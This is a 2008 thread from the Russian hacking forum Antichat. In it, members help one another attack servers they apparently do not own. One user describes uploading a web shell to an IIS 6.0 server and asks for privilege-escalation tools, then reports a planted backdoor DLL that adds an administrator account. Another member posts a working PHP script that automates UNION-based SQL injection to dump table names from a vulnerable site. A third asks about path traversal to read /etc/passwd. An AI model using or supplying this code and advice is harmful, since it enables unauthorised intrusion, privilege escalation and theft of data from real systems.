ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

нужна помощь по Microsoft-IIS/6.0
  #2231  
Старый 03.06.2008, 03:57
mosquito
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
33302

Репутация: 0
По умолчанию нужна помощь по Microsoft-IIS/6.0

добрый день, уважаемое сообщество!
срочно нужна помощь в следующем:

я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied

мне необходимо поднять права юзера на Microsoft-IIS/6.0
нужна dll-ка или софтина для увеличения привилегий

или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там


всем заранее спасибо за помощь.
 
Ответить с цитированием

  #2232  
Старый 03.06.2008, 09:02
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

2 Sabe
Ну если версия 5 ( если майскуль ) то можно вручную извлечь из всех таблиц всю инфу с БД, также есть много скриптов на пхп и перл для автоматизации этого процесса. В ином случае никак бд не слить
 
Ответить с цитированием

  #2233  
Старый 03.06.2008, 09:42
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
Wink

Цитата:
Сообщение от mosquito  
добрый день, уважаемое сообщество!
срочно нужна помощь в следующем:

я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied

мне необходимо поднять права юзера на Microsoft-IIS/6.0
нужна dll-ка или софтина для увеличения привилегий

или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там


всем заранее спасибо за помощь.
Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.

Последний раз редактировалось z3r0cool; 03.06.2008 в 09:50..
 
Ответить с цитированием

  #2234  
Старый 03.06.2008, 16:37
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

0nep@t0p
припустим что 5. можно пример запроса? или скрипт для автоматизации
 
Ответить с цитированием

  #2235  
Старый 03.06.2008, 17:03
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

PHP код:
<?php  
set_time_limit
(0);  
ignore_user_abort(true);   
$s=1;  
$f=39913;  
$fph fopen ("result.txt"'a+');  

  for (
$i=$s$i<=$f$i++) {  
    
$aps file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a  )+from+information_schema.tables+limit+".$i.",1/*");  
    
$res=null;  
      
   
$pattern ="/:::(.+):::/";  
    
preg_match_all($pattern$aps$out);  
    
$res=array_values(array_unique($out[0]));  
    
fputs ($fph$res[0]."\r\n");  
      
    
sleep (5);  
}  
fclose ($fph);    
?>
Незабудь подправить запрос соответсвенно нуждам
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2236  
Старый 03.06.2008, 18:11
mosquito
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
33302

Репутация: 0
По умолчанию

Цитата:
Сообщение от z3r0cool  
Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.
Win Server 2003 R2
SP2
 
Ответить с цитированием

  #2237  
Старый 03.06.2008, 21:06
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию

а шо значит ошибка 406?пыталась попасть в etc путь вида p=../etc/домен/&f=passwd ,ниче страшного если так и оставить,или лучше и это фильтровать?
 
Ответить с цитированием

  #2238  
Старый 03.06.2008, 21:09
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию

ошибку эту знаю,всмысле оно ж все равно не даст файл открыть,или можна попытатьса?
 
Ответить с цитированием

  #2239  
Старый 03.06.2008, 22:31
mosquito
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
33302

Репутация: 0
По умолчанию

нашел там в C:\Inetpub\wwwroot\da***\idq.dll, в которой прописан

There will add a Administrators User "iisuser",Its Password is "ab007".If you want to enter cmd.exe shell,please use ispc.exe.

как его запустить?
 
Ответить с цитированием

  #2240  
Старый 06.06.2008, 09:02
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
По умолчанию

Цитата:
Сообщение от l1ght  
ничего не получается
Значение параметра "npcs" передается в функцию js g_inintPath, там преобразоввывается 7 = База=>NPCs=>Humanoids, 7-1 = База=>NPCs=>Undead, и т.д.

Заметь, при значении 7-1 содержимое самого списка на странице не меняется, т.е. в скуль попадает только 7, а не 7-1, т.ч. параметр "npcs" фильтруется.

Последний раз редактировалось z3r0cool; 06.06.2008 в 09:05..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ